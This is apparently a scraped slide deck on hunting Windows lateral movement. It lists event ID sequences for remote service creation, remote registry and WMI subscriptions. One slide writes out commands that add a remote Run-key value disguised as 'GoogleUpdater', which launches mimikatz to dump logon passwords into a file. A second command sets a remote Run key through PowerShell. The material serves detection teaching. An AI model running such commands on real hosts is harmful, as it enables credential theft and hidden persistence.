  • 40. Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
  • 41. Remote execution via Services – the most interesting events
  • 42. Hunting: search for remotely created services
  • 43. Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
  • 44. Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
  • 45. Remote Registry – the most interesting events
  • 46. Hunting: search for WINREG pipe connections
  • 48. Hunting: search for changes in autostart registry keys
  • 50. Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
  • 52. Remote WMI subscriptions creation – the most interesting events